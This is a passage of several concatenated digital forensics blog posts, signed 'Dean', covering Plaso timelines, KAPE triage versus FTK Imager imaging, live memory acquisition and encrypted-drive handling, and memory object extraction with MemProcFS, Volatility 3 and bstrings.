Option 2: Manual Way — (Better Control) Want to control everything yourself? Here’s how: Step 1: Parse the Image with log2timeline.py log2timeline.py --storage-file timeline.plaso /path/to/image.dd timeline.plaso is the storage file that saves extracted events. Step 2: Check Metadata with pinfo.py pinfo.py timeline.plaso See event counts, sources, time ranges, and other goodies inside the .plaso file. Step 3: Create Timeline Output with psort.py psort.py -o dynamic -w timeline.csv timeline.plaso This command sorts the events and outputs them nicely to a CSV! -------------------------------------------------------------------------------------------------------- 💬 But wait… Why Manual Parsing? You might ask — if psteal.py is so easy, why bother with manual steps? Here’s the thing: Manual parsing lets you use powerful filters. You can selectively extract events, artifacts, or specific activities. It's way more flexible for bigger/messier investigations. 🎯 Artifact Filtering with Plaso (Advanced) Let’s say you want to pull only Bash shell history. Here’s how you can do that: Step 1: Download Artifacts Repository From: https://github.com/ForensicArtifacts/artifacts Inside, you'll find tons of .yaml files under the /data folder. Each YAML defines different forensic artifacts! Step 2: Run log2timeline with Artifact Filter log2timeline.py --storage-file test.plaso /path/to/image.vmdk --artifact-filters BashShellHistoryFile 👉 Tip: The names come from the YAML filenames — so if you wonder "where did BashShellHistoryFile come from?" — now you know. 😄 Output: Step 3: Run pinfo with created plaso file pinfo.py /path/to/outputfile.plaso Step 4: Run psort with created plaso file psort.py -o dynamic -w /mnt/c/Users/Admin/Downloads/test.csv /mnt/c/Users/Admin/Downloads/test.plaso Output: ---------------------------------------------------------------------------------------------------------- Using a Custom Filter File You can also create a mini YAML filter file like this: description: LinuxSysLogFiles type: include path_separator: '/' paths: - '/var/log/syslog*' And then run: log2timeline.py --storage-file test3.plaso /path/to/image.vmdk --filter-file /path/to/your_custom.yaml Common Issues Sometimes you may face weird errors while using artifact filters directly with .yaml (after downloading the files. If that happens, create your own YAML and use --filter-file instead. Pro Tip: Always create a full Plaso storage file first, and then filter during psort , instead of during log2timeline.This gives you more flexibility later! -------------------------------------------------------------------------------------------------------- 🛠 Bonus: Narrowing Timelines with Psort You can narrow results easily after timeline creation: Slice Around a Specific Time psort.py -o dynamic -w timeline.csv timeline.plaso --slice 2025-04-23T22:00:00+00:00 Default slice = 5 minutes before and after. Date Range Filter psort.py -o dynamic -w timeline2.csv timeline.plaso "date > '2025-04-01 23:59:59' and date < '2025-04-23 00:00:00'" This will output events only within your specified date window. -------------------------------------------------------------------------------------------------------- 🚀 Conclusion For simple filesystem timelines → fls + mactime works great. For full system artifact timelines → Plaso/Log2Timeline is the best. Recommendation: Always create a full .plaso file, then slice and filter later using psort.py . 
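To make that recommendation concrete, the two-pass flow from this article boils down to the following (paths are placeholders):

log2timeline.py --storage-file full.plaso /path/to/image.dd
psort.py -o dynamic -w incident_window.csv full.plaso --slice 2025-04-23T22:00:00+00:00

The expensive extraction happens once, and you can re-run psort.py with different slices or date filters without touching the image again.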
Thanks for sticking with me through this article! See you in the next one — stay curious and keep exploring!
----------------------------------------Dean---------------------------------------------------------
- Digital Forensics (Part 2): The Importance of Rapid Triage Collection - Kape vs FTK Imager
In the fast-evolving world of digital forensics, time is critical. Traditional methods of acquiring full disk images are becoming increasingly impractical due to the sheer size of modern storage devices. The reality is that 99% of the necessary evidence typically exists within just 1% of the acquired data. Instead of waiting hours for a full disk image, focusing on this crucial 1% can significantly speed up investigations. Why Rapid Triage Collection Matters Saves Time – Collecting only essential forensic artifacts allows investigators to start analyzing data sooner. Reduces Storage Needs – Full disk images consume massive amounts of storage, whereas triage collection focuses only on critical data. Enhances Efficiency – Investigators can prioritize relevant information and streamline the investigative process. Key Artifacts to Collect During Triage To ensure effective triage, forensic analysts should focus on specific files and artifacts that provide the most insight. These include: File System & Activity Logs $MFT (Master File Table) – Contains metadata about every file and folder on the system. $Logfile & USN Journal – Records changes such as file creation, modification, and deletion. Windows Registry Hives SAM – Stores user account information. SYSTEM – Contains system configuration details. SOFTWARE – Holds installed software and system settings. DEFAULT, NTUSER.DAT & USRCLASS.DAT – User-specific settings and configurations. AMCACHE.HVE – Tracks executed programs. System & User Activity Logs Event Logs (.evtx) – Tracks system and user activities. Other Log Files – Includes setup logs, firewall logs, and web server logs. Prefetch Files (.pf) – Evidence of executed programs, including access history. Shortcut Files (.lnk) – Indicates files and directories opened by the user. Jump Lists – Collection of shortcut files that reveal frequently accessed files and directories. Check Out the below article it contain detail analysis on almost all the artifacts: https://www.cyberengage.org/courses-1/windows-forensic-artifacts User-Specific Data Recent Folder & Subfolders – Stores recent document access history. AppData Folder – Contains browsing history, cookies, and cached files. Pagefile.sys & Hiberfil.sys – Can contain remnants of past user activity stored in virtual memory. Specialized Artifacts for Advanced Investigations Certain artifacts provide deeper insight into a user's actions and past activity, even if data has been deleted. Volume Shadow Copies What It Is: A point-in-time backup of an NTFS volume. Why It’s Useful: Helps recover deleted files, registry hives, and past system states. Location: C:\System Volume Information Recommended Tools: KAPE, VSCMount, Shadow Explorer. ShellBags What It Is: Tracks user navigation through directories, including removable storage and remote servers. Why It’s Useful: Helps reconstruct user activity even if the files/folders no longer exist. Location: Registry keys within NTUSER.DAT and USRCLASS.DAT. Recommended Tools: ShellBags Explorer, SBECmd. Triage Tools for Efficient Collection Forensic professionals can utilize powerful tools to automate and streamline triage collection: FTK Imager – Extracts files by extension. LECmd – Parses .lnk files. JLECmd, JumpList Explorer – Extracts jump list data. PECmd – Analyzes prefetch files. KAPE – Rapid collection of forensic artifacts. Shadow Explorer – Recovers files from volume shadow copies. 
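As a quick illustration of how a couple of these fit into a triage workflow (output paths are placeholders):

PECmd.exe -d C:\Windows\Prefetch --csv D:\Triage\Prefetch
LECmd.exe -d "C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent" --csv D:\Triage\Lnk

Both tools also accept -f for a single file instead of -d for a directory, and the CSV output loads straight into Timeline Explorer.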
------------------------------------------------------------------------------------------------------------- When dealing with digital evidence, one of the most critical steps is proper acquisition. This ensures that investigators can analyze data without tampering with the original evidence. Two powerful tools for forensic acquisition are FTK Imager and KAPE . Each serves a different purpose, and understanding their strengths helps streamline forensic investigations. Why Imaging Matters in Digital Forensics In digital forensics, it’s generally not advisable to work directly on original evidence. Instead, investigators create forensic images— bit-by-bit copies of a device—to analyze while preserving the integrity of the original data. However, imaging takes time, and sometimes investigators must balance speed with thoroughness. This is where triaging becomes an essential technique. Acquisition Using FTK Imager FTK Imager is a well-known forensic imaging tool used to create full disk images, memory dumps, and file captures while maintaining forensic integrity. The step-by-step guide for FTK Imager-based imaging is available in a detailed PDF document on my website. You can download it from the Resume section under the document name "FTK Imager Based Imaging" . Acquisition Using KAPE K APE (Kroll Artifact Parser and Extractor) is a rapid forensic triage tool that can collect targeted artifacts from a live system or forensic image . Unlike FTK Imager, which captures everything, KAPE focuses on extracting critical forensic artifacts such as: Event logs Registry hives Browser history User activity logs https://www.cyberengage.org/courses-1/kape-unleashed%3A-harnessing-power-in-incident-response KAPE is also useful for remote forensic collection, making it highly efficient for Incident Response (IR) cases. You can find my complete article on KAPE acquisition, analysis, and IR cases on my website, which includes detailed screenshots. Triage vs. Full Imaging: When to Use What? A key forensic question is whether to triage first or perform a full disk image before analysis. The decision depends on time constraints and urgency . If time is not an issue , creating a full forensic image first is the best practice. This ensures every piece of data is preserved for in-depth analysis. If speed is critical , such as in incident response cases, triaging first with KAPE allows investigators to gather key forensic artifacts quickly. A balanced approach involves first running KAPE for rapid data collection and then starting full disk imaging with FTK Imager. This way, analysis can begin while the full image is still being created. How to Balance Speed and Completeness? Use a write blocker when dealing with original media to prevent accidental modifications. Run KAPE first to quickly extract key forensic data (~1% of the total data that is most relevant to investigations). Start full imaging with FTK Imager while simultaneously analyzing the KAPE-collected data. By the time imaging is complete , investigators may already have leads from the extracted artifacts. This win-win approach ensures rapid initial analysis while maintaining forensic integrity. Final Thoughts Both FTK Imager and KAPE are invaluable forensic tools. FTK Imager provides a complete forensic image, while KAPE allows for fast triage and targeted artifact collection. The right tool depends on the specific case, but combining both strategically helps investigators work efficiently without compromising forensic standards. 
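For reference, a typical KAPE triage run looks something like this (the target choice and paths are illustrative — pick targets that match your case):

kape.exe --tsource C: --tdest D:\Triage\%m --target !SANS_Triage --zip triage

Here --tsource is the drive being triaged, --tdest is where the collected files land (%m expands to the machine name), and !SANS_Triage is a compound target covering most of the artifacts listed earlier; FTK Imager can then run a full disk image in parallel while you start on the KAPE output.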
For a detailed walkthrough of these processes, check out my full documentation on FTK Imager and KAPE on my website! ----------------------------------------------Dean--------------------------------------------
- Disk Imaging (Part 1) : Memory Acquisition & Encryption Checking
Imagine you need to make a perfect copy of everything on a hard drive—not just the files you see, but also hidden system data, partitions, and even deleted files that might still be recoverable. This is where disk imaging comes in! Whether you’re working in digital forensics, IT, or just want to back up your system. Disk imaging is important What is Disk Imaging? Disk imaging is the process of creating an exact, bit-for-bit copy of a storage device (like a hard drive or SSD) and saving it as a file. Think of it as taking a snapshot of your entire drive , capturing everything from active files to hidden system data. This is different from just copying files, as it preserves the structure and details of the original disk. However, in some cases, creating an exact duplicate isn’t always possible. SSDs (Solid-State Drives) may not allow precise duplication due to how they handle data storage. Bad sectors (damaged parts of a hard drive) might prevent some data from being copied, leaving gaps in the image file. How Does Disk Imaging Work? The disk imaging process involves three key components: The Source Drive – This is the drive you want to copy. A Write Blocker – A tool that prevents any accidental changes to the source drive while imaging. Imaging Software – The program that reads the source drive and creates an image file. Choosing the Right Image Format When creating a disk image, you’ll typically save it in one of two formats: E01 (Expert Witness Format) – The most popular choice because it includes compression, making the file smaller while keeping all the data intact. DD (RAW format) – A bit-for-bit copy with no compression, meaning it takes up more space but remains a direct replica. Some of the most widely used disk imaging tools include: FTK Imager X-Ways Imager Guymager DD (a classic command-line tool) Steps to Create a Disk Image Connect the source drive to your computer using a write blocker. Start the imaging software and select the source drive. Choose a destination location where the image file will be saved. Select the format (E01 or DD) based on your needs. Start the imaging process and wait for completion. Once finished, most imaging software (except DD) generates a log file. This report contains: Drive details (size, sector count, etc.) A hash value (used to verify data integrity) Any errors, such as unreadable sectors Hardware vs. Software Imaging While the above method uses s oftware-based imaging (requiring a computer and write blocker), another option is hardware-based imaging . Hardware Imaging Devices A hardware imager is a standalone device that combines the functions of a computer, write blocker, and imaging software in one unit. These devices: Are faster and more efficient for large-scale imaging Minimize errors and risks of accidental modifications Can save images to another hard drive or even a network location (if supported) However, be careful not to mix up the source and destination drives! Formatting the wrong drive could lead to irreversible data loss. How Long Does Imaging Take? Disk imaging can take several hours, depending on: The size of the drive How much data is stored on it The speed of the connection (USB, SATA, or network transfer) While waiting, many forensic analysts take advantage of this time to review key data (a process called rapid triage ) , helping to identify important leads before the full image is ready. Live vs. Dead Imaging: What’s the Difference? Live Imaging – Done while the system is still running. 
This is useful when you need to capture volatile data like running processes, open network connections, or system logs. Dead Imaging – Performed after powering down the system. This is the traditional approach and is often used for full disk acquisitions. Why Live Imaging Matters A running system provides valuable forensic insights, such as: What applications are currently running Connected external devices (USBs, external drives, etc.) Potential signs of tampering or malicious activity If the system is off, you won’t get this real-time data. But if it's on, documenting its current state before imaging is crucial. Old vs. Modern Forensic Acquisition Methods In the past, forensic specialists followed a “dead box” approach , where the computer was shut down before data collection. This was because: RAM (temporary memory) was small and not often considered valuable. Encryption was rare, making it easy to access data even after shutting down. However, today’s machines often use encryption and security measures like TPM (Trusted Platform Module) , making live imaging more important than ever. If you shut down an encrypted device, the data could be permanently locked. How Were Systems Handled in the Past? If it was a regular computer (not a server), forensics experts would unplug it directly. If it was a server, they would shut it down properly to avoid issues with RAID configurations or system failures. -------------------------------------------------------------------------------------------------------- Live Response When dealing with a running system , the way you collect data can significantly impact an investigation . Unlike a powered-off system, where everything is static, a running machine holds volatile data that can be lost if not captured correctly. Live response is the process of collecting critical data from a system that is still powered on. This includes memory (RAM), active processes, network connections, and encryption states. U Step 1: Document the System’s Status Before interacting with the machine, it’s essential to document everything : What’s displayed on the screen? Are any applications open? Are there external devices connected? Is the system asleep or in hibernation mode? Many computers may appear off when they are just in sleep mode . A simple press of the spacebar or mouse movement can wake them up. Also, check for indicator lights on the computer case—these can show that the system is still running. Step 2: Determine the Order of Volatility Volatile data disappears quickly once the system is shut down. This means you need to collect the most fragile information first. The order of volatility in a forensic investigation is as follows: Dump Memory (RAM) – This contains running programs, network sessions, user activity, passwords, and even malware that only exists in memory. Check for Encryption – If encryption is present, shutting down the system could permanently lock the data. Perform Triage Collection – Extract key artifacts from the live system for quick analysis while the full forensic image is created. Step 3: Dump Memory (RAM) RAM is one of the richest sources of forensic data , but also the most fragile . I f the computer is turned off before capturing RAM, this data is gone forever. 💡 What can be found in RAM? Running processes Open files and directories Network connections Chat conversations Encryption keys Malware that exists only in memory How to Capture RAM? 
There are several tools available for memory acquisition, with Windows systems having more options than Macs . Before starting, ensure the system is disconnected from all networks (Ethernet and Wi-Fi) to prevent remote interference. To capture RAM: ✅ Use a USB drive or external SSD with forensic tools installed ✅ Store the memory dump on a fast external drive to speed up the process ✅ Use specialized tools like Volatility to analyze memory contents later Important Considerations: Mac computers are more difficult to analyze due to fewer available tools. Laptops should be plugged in to prevent power loss during acquisition. Be careful with encryption keys —they often exist in RAM and can be retrieved before shutdown. Step 4: Check for Encryption Encryption can be a major roadblock if not handled properly. Many modern computers use full-disk encryption with tools like: BitLocker (Windows) VeraCrypt PGP Encryption If the system is still running, the encrypted data is often accessible. The best approach is to create a logical volume image while the machine is still running. This ensures that decrypted data is preserved. 💡 If encryption is present: ✔️ Image the drive before shutting down ✔️ Extract encryption keys from memory (if possible) ✔️ If no encryption is detected, proceed with normal disk imaging Step 5: Perform Triage Collection While waiting for full disk imaging to complete, triage collection can provide fast insights. Using tools like KAPE , forensic examiners can extract: Browser history User activity logs Recently opened files System logs This allows investigators to identify leads early without waiting hours for a complete forensic image. Step 6: The Reality of Live Data Collection Interacting with a running system always leaves some trace. The key is to minimize changes and document everything. 💡 Common mistakes: Shutting the system down too early and losing RAM data Forgetting to disable network access , allowing remote tampering Using slow USB drives that take too long to capture memory Why RAM Collection Matters More Than Ever With modern encryption and cloud-based applications, RAM is now more valuable than ever in forensic investigations. Unlike 15 years ago, when most data was stored on hard drives, today’s machines: ✔️ Have 8GB, 16GB, or even 32GB of RAM (containing a huge amount of data) ✔️ Store passwords, decryption keys, and session data in memory ✔️ Run software that only exists in RAM (fileless malware) Step 7: Storage and Transfer of Memory Dumps Since memory dumps can be large, choosing the right storage device is critical. A solid-state external hard drive is the best choice due to high-speed data transfer . Final Step: Document Everything! Since live response actively changes system data , it’s crucial to: 📌 Take photos or videos of each step 📌 Write detailed notes on what actions were taken 📌 Record timestamps for each forensic operation -------------------------------------------------------------------------------------------------------- Live Response Tools When performing live forensics on a running system, one of the biggest challenges is introducing your tools without altering or corrupting evidence . While it may seem simple—just plug in a USB drive and start collecting data—there are several critical factors to consider. Key Questions to Ask Before Deploying Live Response Tools Before introducing any tools into a system, ask yourself: ✅ How much space will I need? (Memory dumps and disk images can be large.) ✅ How should my external drive be formatted? 
(NTFS for Windows, exFAT for cross-compatibility.) ✅ What resources are available? (Are USB ports, network storage, or optical drives an option?) ✅ Can I trust the software already on the target system? (Always bring your own trusted binaries.) ✅ Are there any environmental restrictions? (Some locations, such as government facilities, may restrict USB devices.) ✅ Do I have a backup plan? (If my primary tool fails, do I have an alternative?) Choosing the Right External Storage Since live forensics often involves capturing large amounts of data (such as RAM dumps or forensic images), using a high-quality external storage device is crucial. 💡 Best Practices for External Storage Devices: ✔️ Use a large-capacity, high-quality external SSD for faster read/write speeds. ✔️ Format the drive as NTFS for Windows systems or exFAT for cross-platform compatibility. ✔️ Always document the details of the device before use. Tracking USB Devices with NirSoft USBDeview To maintain a proper chain of custody, document the details of your external storage using a tool like NirSoft USBDeview . This allows you to: Record the make, model, and serial number of your USB device. Include this information in your forensic reports for future reference. Where Should You Store Collected Data? One of the biggest logistical challenges in live response is deciding where to store the collected data . This depends on: The size of the storage device you’re imaging. The amount of memory on the system. The number of devices you need to process. Storage Recommendations: ✅ External SSDs – The preferred option, but always bring more space than you think you’ll need. I f you estimate needing 1TB , bring 4TB —unexpected extra data is common! ✅ Network Storage (Less Optimal) – If an external drive isn’t an option, a network share may work, but consider security risks (who else has access?). ✅ Chain of Custody Considerations – Keep strict control over the storage device to prevent tampering or unauthorized access . Selecting the Right Live Response Tools Once you have a storage device ready, the next step is choosing and deploying the right tools for live response. Your toolkit should include: 🔹 Memory collection tools (e.g., DumpIt, Belkasoft RAM Capturer, FTK Imager) Command Line vs. GUI Tools When performing live forensics, minimizing system impact is critical . Using command-line (CLI) tools instead of graphical user interface (GUI) tools can help: ✔️ Reduce memory usage ✔️ Minimize system modifications ✔️ Prevent unnecessary process execution Top Memory Collection Tools for Live Forensics 1. DumpIt (by Comae Technologies) Pros: ✅ Simple command-line tool with minimal system impact ✅ Can be executed without additional arguments for quick memory dumps ✅ Allows file compression to save space Cons: ❌ Compressed files may not be compatible with all memory analysis tools 💡 Usage: To capture memory using DumpIt, simply execute: DumpIt /OUTPUT If run without arguments, DumpIt will prompt for confirmation before proceeding. The collected memory file will automatically be named with the machine name and timestamp. 2. Belkasoft RAM Capturer Pros: ✅ Minimal GUI interface , reducing system modifications ✅ Uses kernel mode driver to bypass anti-forensic techniques ✅ Available in 32-bit and 64-bit versions to minimize unnecessary code execution Cons: ❌ Requires administrator privileges 💡 Usage: Launch Belkasoft RAM Capturer . Select an output folder for the memory dump. Click “Capture!” to start memory acquisition. 3. 
FTK Imager Pros: ✅ Well-known forensic tool with wide industry adoption ✅ Can capture both memory and full disk images ✅ Provides verification logs for integrity checks Cons: ❌ Older versions (pre-3.0.0) operate in user mode , which may limit access to certain memory areas ❌ May not detect advanced malware hiding in kernel memory 💡 Important Note: If using FTK Imager, update to version 3.0.0 or later to ensure kernel-level access to all memory areas. Final Considerations: Ensuring a Secure and Effective Live Response 🔹 Plan ahead – Know the environment and what resources are available. 🔹 Minimize system impact – Use command-line tools whenever possible. 🔹 Document everything – Keep detailed records of every action taken. 🔹 Secure collected data – Store forensic images and memory dumps on encrypted, controlled-access storage. 🔹 Always have a backup plan – If one tool fails, be ready with an alternative. -------------------------------------------------------------------------------------------------------- Handling Encrypted Drives Encryption presents a major challenge in digital forensics. While forensic imaging techniques typically allow investigators to access data on a storage device, encryption software like BitLocker, VeraCrypt, and PGP can make this data completely inaccessible without the proper decryption key . What Happens When a Drive is Encrypted? If encryption is enabled, imaging the physical volume (even with a write blocker) only captures the encrypted data , which is useless without the decryption key. This is especially problematic if the device is turned off because, in many cases, powering down the system can permanently lock the data . 💡 Key Takeaways: ✔️ If encryption is detected, do NOT shut down the system before performing a live capture. ✔️ If the system is running, logical imaging may allow access to decrypted data. ✔️ Failing to check for encryption before imaging can result in lost evidence. How to Detect Encryption on a Running System To determine whether a system is using encryption, forensic analysts use specialized tools that can scan for encryption signatures . One such tool is Encrypted Disk Detector (EDD) from Magnet Forensics. 🔍 Using EDD to Identify Encrypted Volumes EDD is a command-line tool that checks local physical drives for encryption software, including: BitLocker (Windows) VeraCrypt & TrueCrypt PGP® (Pretty Good Privacy) Checkpoint, Sophos, and Symantec encrypted volumes 💡 How EDD Works I have created an complete article on EDD (Do check it out you will learn how to use the tool https://www.cyberengage.org/post/exploring-magnet-encrypted-disk-detector-eddv310 EDD does not locate encrypted container files that are not mounted, but other forensic tools can assist with that. Handling VeraCrypt and TrueCrypt Encryption VeraCrypt is the successor to TrueCrypt , and both function similarly: 🔹 Users create an encrypted container that appears as a mounted drive. 🔹 Files stored inside are inaccessible without a password or keyfile . 🔹 A hidden partition can be created within the primary encrypted volume. Detecting VeraCrypt/TrueCrypt Artifacts If a container is currently mounted , EDD will detect and flag it . However, once unmounted, traces of its existence may be deleted from the system . 💡 Registry Analysis for VeraCrypt/TrueCrypt Older versions of these tools left traces in the Windows Registry under: HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices Older versions left artifacts even after unmounting . 
Newer versions delete traces after unmounting (though remnants may still exist). Pro Tip: Finding Encrypted Containers Since encrypted containers store a large amount of data, they tend to be some of the biggest files on the system . You can identify them by: ✅ Scanning for large, unexplained files on the system. ✅ Ignoring system files like pagefile.sys and hiberfil.sys. ✅ Checking recently accessed files for unusual activity. BitLocker Encryption: Challenges & Solutions BitLocker is Microsoft’s built-in encryption tool, included with Windows Enterprise, Pro, and Ultimate editions. 💡 How BitLocker Works: ✔️ Uses AES encryption (128-bit or 256-bit) . ✔️ Can be enabled via Group Policy (common in corporate environments). ✔️ Requires a password, PIN, or recovery key to unlock data. The Biggest Forensic Challenge with BitLocker If a BitLocker-encrypted drive is removed from the original computer , the data is completely inaccessible without the recovery key . However, if the system is still running , forensic analysts can bypass encryption and extract data while it remains unlocked . Two Ways to Handle BitLocker-Protected Drives 🔹 Option 1: Live Logical Imaging If the system is running, image the logical drive instead of the physical disk . This ensures you capture decrypted data. 🔹 Option 2: Recover BitLocker Keys BitLocker requires users to save a recovery key to a separate drive or print it. In corporate settings, IT administrators may have stored recovery keys via Group Policy. Best Practices for Handling Encrypted Systems 🔹 Always check for encryption before shutting down the system. 🔹 If encryption is detected, prioritize live imaging. 🔹 Use tools like EDD to scan for encryption software. 🔹 Look for large container files if encryption is suspected. 🔹 Consult Group Policy settings for corporate BitLocker deployments. -------------------------------------------------------------------------------------------------------- Wrapping Up Digital forensic acquisition is as much about strategy and preparation as it is about technical execution. Whether capturing volatile memory, imaging a disk, or handling encrypted data, the right approach can mean the difference between retrieving crucial evidence or losing it forever . By following best practices, using trusted tools, and adapting to evolving challenges, forensic investigators can ensure data integrity, accuracy, and reliability in every case they handle. 🚀 ---------------------------------------------Dean-------------------------------------------
- Extracting Memory Objects with MemProcFS/Volatility3/Bstrings: A Practical Guide
----------------------------------------------------------------------------------------------------
I have already written in-depth articles on MemProcFS, Bstrings, and Volatility 3 — do check those out to learn each tool in depth! Links below:
https://www.cyberengage.org/post/memprocfs-memprocfs-analyzer-comprehensive-analysis-guide
Volatility 3
https://www.cyberengage.org/post/step-by-step-guide-to-uncovering-threats-with-volatility-a-beginner-s-memory-forensics-walkthrough
Strings/Bstrings
https://www.cyberengage.org/post/memory-forensics-using-strings-and-bstrings-a-comprehensive-guide
----------------------------------------------------------------------------------------------------
Today we'll walk through more of a comparison of these approaches — let's get started.
------------------------------------------------------------------------------------------------------------
When analyzing a system's memory, you're often looking for key artifacts like suspicious processes, DLLs, drivers, or even cached files. These could be crucial for forensic investigations, malware analysis, or troubleshooting. With MemProcFS, extracting these objects becomes incredibly simple—just like browsing files in a regular folder.
------------------------------------------------------------------------------------------------------------
MemProcFS
Why Extract Memory Objects?
Think of RAM as a goldmine of real-time data. Anything that has happened on a system—running programs, opened documents, registry changes, and even deleted files—can still be floating around in memory. If you know where to look, you can extract critical pieces of evidence, such as:
Running processes and their memory sections
Loaded DLLs and executables
Cached documents and registry hives
The NTFS Master File Table (which contains a list of all files on disk)
Active Windows services
With MemProcFS, all of these objects can be accessed like regular files, making extraction quick and hassle-free.
------------------------------------------------------------------------------------------------------------
Navigating Memory Objects in MemProcFS
MemProcFS organizes memory data in a virtual folder structure, making it intuitive to browse and extract files. Here's how you can locate key objects:
Processes and Memory Sections
You can find process-related data under:
M:\name\powershell.exe-5352\ (organized by process name)
M:\pid\7164\ (organized by process ID)
These folders contain everything from heaps and memory dumps to loaded DLLs.
DLLs and Executables
The modules folder holds DLLs and executables loaded into memory. Each DLL or executable is stored as pefile.dll, allowing you to extract and analyze it.
Tracking Memory Sections
The vmemd folder helps you track specific memory regions linked to suspicious activities.
The heaps folder is useful for finding private memory allocations, where processes store sensitive data.
The minidump folder provides a snapshot of process memory, including both code and data.
Drivers and System Modules
Most kernel drivers can be found under the System process folder (M:\pid\4\modules\).
Some graphics drivers (Win32k) reside in the CSRSS.exe process, though they're rarely useful for most investigations.
------------------------------------------------------------------------------------------------------------
Extracting and Analyzing Memory Objects
MemProcFS makes extraction as simple as copying a file. You can:
Open memory sections in a hex editor for low-level analysis.
Extract strings from executables to identify potential malware behavior.
Upload a suspicious DLL or EXE to VirusTotal for threat intelligence. Open DLLs in a disassembler to inspect their functionality. Run an antivirus scan —though it’s best to copy the file first, as security tools may quarantine it. Pro Tip: If a tool fails to open a virtual file, try copying it to a local folder first. ------------------------------------------------------------------------------------------------------------ Handling Terminated Processes Not seeing a process under M:\name or M:\pid? It might have exited before you started your analysis. By default, MemProcFS doesn’t display terminated processes since their memory can be incomplete or corrupted. However, you can enable this feature by modifying: M:/config/config_process_show_terminated.txt Change the value to 1, and MemProcFS will attempt to reconstruct folders for terminated processes. ------------------------------------------------------------------------------------------------------------ Volatility3 You might be wondering why the dedicated dumping plugins disappeared in Volatility 3. The truth is—they haven't! The functionality is still there; it's just been integrated into the standard plugins with an additional --dump option. Key Changes in Volatility 3 The --dump option: If a plugin supports dumping memory objects, you'll see this option in the plugin help. Output folder (-o) parameter: This replaces Volatility 2’s --dump-dir= and is crucial when extracting drivers, DLLs, and other artifacts to keep things organized. Parameter Order Matters: Unlike Volatility 2, where things were more flexible , Volatility 3 requires -o to come before the plugin, while plugin-specific options like --pid and --dump come after . Extracting Executables To extract suspicious processes from memory, use the windows.pslist --dump plugin. By default, it dumps all processes in the EPROCESS list, but you can narrow it down using --pid. Commands: python3 vol.py -f memory.img -o output-folder windows.pslist --dump For terminated or unlinked processes, use windows.psscan --dump, which replaces the old procdump plugin in Volatility 2. Extracting DLLs If you need to pull DLLs from memory, windows.dlllist --dump is your go-to plugin. It extracts all DLLs by default, but filtering by --pid is a good practice to avoid unnecessary files. Commands: python3 vol.py -f memory.img -o output-folder windows.dlllist --pid 1040 --dump The equivalent Volatility 2 plugin was dlldump. Extracting Drivers When analyzing potentially malicious drivers, use windows.modules --dump. If you need to go deeper and retrieve unloaded or unlinked drivers, windows.modscan --dump is the way to go. Commands: python3 vol.py -f memory.img -o output-folder windows.modules --dump In Volatility 2, this was handled by moddump. Important Notes: No Guarantees on Data Availability: Some memory objects might be paged out, making extraction incomplete. Including Page Files Helps: If possible, analyze the page file to recover missing artifacts. Process Memory Extraction Dumping process memory is trickier than extracting files. Process memory contains both code (executable sections) and data (buffers, command-line inputs, PowerShell scripts, etc.). Tools for Dumping Process Memory: windows.pslist --dump: Extracts executable code, similar to Volatility 2’s procdump. windows.memmap --dump: Dumps all memory-resident pages, capturing both code and data (like Volatility 2’s memdump). 
MemProcFS: Creates a pefile.dll representing the executable part of a process and a minidump.dmp file containing key process memory sections. ------------------------------------------------------------------------------------------------------------ Strings/Bstrings Searching for Artifacts in Memory Dumps One of the most effective forensic techniques is string searching , which helps identify artifacts like IP addresses, domains, malware commands, and user credentials. Here’s how to do it: Using strings (Linux) strings -a -t d memory.img > strings.txt strings -a -t d -e l memory.img >> strings.txt sort strings.txt > sorted_strings.txt Using grep (for targeted searches) grep -i "search_term" sorted_strings.txt Using bstrings.exe (Windows/Linux) Eric Zimmerman's bstrings is a great alternative that extracts ASCII and Unicode strings simultaneously and even performs initial searches. Commands: bstrings -f memory.img -m 8 # Extracts strings of length 8+ bstrings -f memory.img --ls search_term # Searches for a specific term bstrings -f memory.img --lr ipv4 (use a regex to find IP version 4 addresses) ------------------------------------------------------------------------------------------------------------ MemProcFS vs. Volatility While MemProcFS makes memory analysis incredibly convenient, it’s not a one-size-fits-all solution. Volatility is another powerful tool that provides more in-depth forensic capabilities, such as: Advanced memory carving techniques More detailed malware analysis Reconstruction of deleted or hidden processes For best results, combine both tools—use MemProcFS for quick and easy extraction, and Volatility for deeper analysis. ------------------------------------------------------------------------------------------------------------ Wrapping Up Memory forensics can be overwhelming, but tools like MemProcFS simplify the process. By treating memory like a file system, it allows you to quickly extract key artifacts, analyze suspicious activity, and uncover critical forensic evidence. Whether you’re investigating malware, troubleshooting system crashes, or performing digital forensics, MemProcFS gives you the power to dig deep into memory with ease. ---------------------------------------------Dean----------------------------------------------






